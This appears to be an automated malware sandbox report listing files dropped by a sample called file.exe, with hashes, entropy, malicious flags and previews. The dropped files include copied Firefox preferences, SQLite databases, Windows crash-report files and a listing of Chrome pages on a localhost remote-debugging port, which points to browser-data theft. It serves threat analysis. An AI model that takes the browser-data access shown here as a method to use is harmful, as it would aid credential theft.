                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\JEHJKJ

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):106496
                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                    Malicious:false
                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\KJKJJE

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1026
                                                                                                                    Entropy (8bit):4.690394987545919
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                    MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                    SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                    SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                    SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                    Malicious:false
                                                                                                                    Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_3dd44e29f36a65a92e851de5c77f1c3c81cd888_b7e7cbfd_a5117317-f17e-401d-991a-dde495416fc7\Report.wer

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.0486480826369646
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:U4e/hzvkPk0BU/fI3juKZrR3tOyzuiF1Z24IO8TVB:UknBU/YjJ8yzuiF1Y4IO8X
                                                                                                                    MD5:7840800D6B50AE1F3558D71549AAC225
                                                                                                                    SHA1:BCB7FA4DF14CFC913F62ED9D093D16099167936D
                                                                                                                    SHA-256:1B91DB22C8E5D8B1178CC7F1EB8EB6D36512DFA1BE5C6B6B712A45444689947A
                                                                                                                    SHA-512:853C37C677FB525836B6F5A3DEDCE67FFF3402DCE9C526AE6030F9CF9154571165FFF0CFD337609B7E72350483029E746C22393C0359ABB3B2D2E9C425BA281F
                                                                                                                    Malicious:true
                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.4.3.6.4.9.1.1.4.0.1.5.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.4.3.6.4.9.2.2.0.2.6.5.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.1.1.7.3.1.7.-.f.1.7.e.-.4.0.1.d.-.9.9.1.a.-.d.d.e.4.9.5.4.1.6.f.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.f.d.6.c.d.d.-.4.2.9.5.-.4.b.1.8.-.a.9.6.b.-.6.2.5.c.a.3.0.6.2.a.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.4.0.-.0.0.0.1.-.0.0.1.4.-.1.e.d.9.-.c.f.5.d.1.3.4.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.6.5.5.e.e.0.a.8.7.6.2.7.1.4.7.5.4.c.7.1.3.e.5.b.b.3.1.7.1.f.f.1.b.e.3.4.6.7.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7C2.tmp.dmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Sat Nov 30 10:34:51 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):299496
                                                                                                                    Entropy (8bit):1.6064180793692215
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:0sWtcyklZE+ASZB6/EEpB9asFasMAD7PeiHcorTC4K+2:0sBpsn/EEfFaHQPhconev
                                                                                                                    MD5:7197E26A93264986BB4BBB0C7C98A0A6
                                                                                                                    SHA1:F4D585FE7AF334EF1C57AB65FE93000B5F306401
                                                                                                                    SHA-256:6440781D0B6CF21C8F71A75031E05787A2AC08B78CA398B3748CA8D906D9EAD9
                                                                                                                    SHA-512:1CFD3522FA8F8F597E48767773417CC82CCD59EE9E5C27BC78AAE858EDD18C30650B9EFBABD83050C41E919C2AE0E99C4174CAF464E18DC25D9F43FCBFBFED4E
                                                                                                                    Malicious:false
                                                                                                                    Preview:MDMP..a..... .......K.Jg........................p...........T...............T.......8...........T............u..X...........l)..........X+..............................................................................eJ.......+......GenuineIntel............T.......@.....Jg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA53.tmp.WERInternalMetadata.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8330
                                                                                                                    Entropy (8bit):3.6935963552965814
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:R6l7wVeJaCk6j6Y9TSU9qgmfB3expr189bHHesf0KDlHm:R6lXJa6j6Y5SU9qgmfBe+HHdfXG
                                                                                                                    MD5:2D63F93F270CC88127B5B04F32042D9E
                                                                                                                    SHA1:958F72FCC4A4E4B9B7F8C3CEE04C6F5055DCBBB9
                                                                                                                    SHA-256:54E011BCEA98100D71E6D07BF6D9110912C2EFF53FFF45C3604846BD5477C5DA
                                                                                                                    SHA-512:88FD946DF5C4A6EBEF264991511AF7DAF1831B07BC7A7F5E7321B5C578843DFB84CFA5F51746AC1FAAFD2E1D8EB8EFF15F008745E7D809F0CD779442403A9F40
                                                                                                                    Malicious:false
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.7.6.<./.P.i.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDAC1.tmp.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4564
                                                                                                                    Entropy (8bit):4.440464425333531
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zsZTJg77aI9TpfqWpW8VYjYm8M4J2uuF2+q8FSkENu5id:uIjfHI7JpfL7VXJfwku5id
                                                                                                                    MD5:23982CA86B6922A941777AEF214922A1
                                                                                                                    SHA1:770CDD6DC432D4060378A981C7EFAD6EC0ABC677
                                                                                                                    SHA-256:8ECE3978E57F643C85E9786233D45D9610AF21F401E52E0C598E2450F030F505
                                                                                                                    SHA-512:AA3C2B128D59862E9A17A843364F95E9B5D204D9829D1CF4038E6036145110794D7734D66962EB4CA71573E775E0AF3CAE592F14407174FCD1E5C2506EE48B86
                                                                                                                    Malicious:false
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="610657" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:JSON data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1787
                                                                                                                    Entropy (8bit):5.373823109357971
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:SfNaoCly16TEClm/fNaoCFNBQNBNCFNufNaoCXE3MCX0fNaoCT3O0UrU0U8Ct:6NnC1TECsNnCFN+NjCFNWNnCXyMCXgNY
                                                                                                                    MD5:1CCD9D8FDA30848595DC8D570C9B0684
                                                                                                                    SHA1:59A2835C1A7EBEB82EF2247FFC60F892AEE47DFD
                                                                                                                    SHA-256:631738D4E70176FC693ACB486EE0EA8A9B6167E9AFCE15E7D9B8CB3579D34D90
                                                                                                                    SHA-512:B9E7401CD1D7D460DF54B5AF4B3CD4CAEEB6A79168D93433149E5052B23D4A0F3249D89FE2A84A2ADD83A4F875A360EC2BD46DDFB988DFDDC1244816C531D45A
                                                                                                                    Malicious:false
                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4A5F27ED9FA872DD2F848BD3718881F6",.. "id": "4A5F27ED9FA872DD2F848BD3718881F6",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4A5F27ED9FA872DD2F848BD3718881F6"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/29787EE9FF68AA5599FD0288903A6BD6",.. "id": "29787EE9FF68AA5599FD0288903A6BD6",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/29787EE9FF68AA5599FD0288903A6BD6"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1835008
                                                                                                                    Entropy (8bit):4.465299173177091
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:+IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbZ:TXD94+WlLZMM6YFH1+Z
                                                                                                                    MD5:9F6ECE779C319D3129451C303CA1CC03
                                                                                                                    SHA1:18E746C10D9F71A282A56D32C196F04F6C29292E
                                                                                                                    SHA-256:EB70856596A326784B138111F0CA2CA67DB69C220B2E9702FE031F291BA59273
                                                                                                                    SHA-512:EEB08F3E06F618E167C3F83CB9F09CFA56AFEFA2A30BFC194B551BE3FAD77238579256A1C791B1503CB2CF2549D3F11222F9B3868B12EAF27C32305BC90E7B4C
                                                                                                                    Malicious:false
                                                                                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...|.C...............................................................................................................................................................................................................................................................................................................................................9.H........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    Chrome Cache Entry: 68

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (2930)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):2937
                                                                                                                    Entropy (8bit):5.855116250527532
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:rgKlgZ01daBIbx6666SuZ6+rGibhfiHBOqM5b9MwAMV3ZITikguSEqmfffQfo:rrliNIN6666SeLjh6HK5xMwCfffQfo
                                                                                                                    MD5:9CA0484558D97E969D40791D15D6BCE8
                                                                                                                    SHA1:F5DA4C32E7F960D864D839A2410B75A25D522BB5
                                                                                                                    SHA-256:ED97B7BAF2DB22793A5F2DDDAAC483D7C48805B6B6D40EE212A77F806818C66C
                                                                                                                    SHA-512:3CF16D5F00812BCAA182483AA39198E895FD299D440214DED447DF8024E3D91080C2881B984374BE923C94BFDA533901799A3BF376AE83443352CF0C37692034
                                                                                                                    Malicious:false
                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                    Preview:)]}'.["",["philadelphia eagles vs baltimore ravens","daily horoscopes for november 29 2024","ripple xrp price prediction","blue lock rivals codes roblox","iga .wi.tek","midnight glitz quencher","south korea china russia jets","hybe newjeans"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWM1NGJ2MTB2EhRQb2xpc2ggdGVubmlzIHBsYXllcjKzC2RhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBTUFNQklnQUNFUUVERVFIL3hBQWFBQUFEQVFFQkFRQUFBQUFBQUFBQUFBQUZCZ2NJQkFNQy84UUFOUkFBQWdFREFRWURCUVlIQUFBQUFBQUFBUUlEQkFVUkFBWVNJVEZCVVJOaGtRY2ljZEh3R

                                                                                                                    Chrome Cache Entry: 69

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):29
                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                    Malicious:false
                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                    Chrome Cache Entry: 70

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):132964
                                                                                                                    Entropy (8bit):5.435211786716571
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:fukX3ioI5wrfFiC8jMbk/5xnRPpvsMTwR2i6o:fB3dDFqr/5xnRPpvrwR8o
                                                                                                                    MD5:BFD3F2EBA7C06FA696C9EC5C6AE32137
                                                                                                                    SHA1:0B75BDD18E12CA27A9302F16C8568893A9341DF7
                                                                                                                    SHA-256:049921FAD9C193321FBCE9121FD06F15BB02FC12073C1CC1759BF4C4C3D98FEF
                                                                                                                    SHA-512:EF62FFCC34EA4E776AC78D4287AB230720FEEE9CECB4B182C4D157FCDD28D79BC62325BFBEF497673C8343A2FDD1AC1055FB265856BF605B6561D269068A36A5
                                                                                                                    Malicious:false
                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                    Chrome Cache Entry: 71

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):5162
                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                    Malicious:false
                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                    Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                    Chrome Cache Entry: 72

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (2802)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):174866
                                                                                                                    Entropy (8bit):5.55119411677623
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:WEBR5OnrJtUy+9+thjN33FhJpGha9HMRWIjFBJBHTZPYb62+vQ1jV9HyT++Wq7ki:WKR5Or8y+9+tdFFhJchaZMRWIhBJBHTl
                                                                                                                    MD5:E75DAA83A93E581139D8AD8EE8D62358
                                                                                                                    SHA1:AC0DED87D443840A77B446D53DA22BFD52441D5C
                                                                                                                    SHA-256:177BD25B85BF254F44B515271222B773D2CF618FA17587D2DD507CE2104A3542
                                                                                                                    SHA-512:50FD351CB34D216BC443BC8A3FD2773925FC7151B180E5F697750B356A2649AC302E1FEF4575416C02FF04498F877EB4326F5B21AAC713AAAA38ED6E8BB65C43
                                                                                                                    Malicious:false
                                                                                                                    URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Z8FBMQoacoc.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTt16WS-AyvNEln9-TaO-tZR_15utQ"
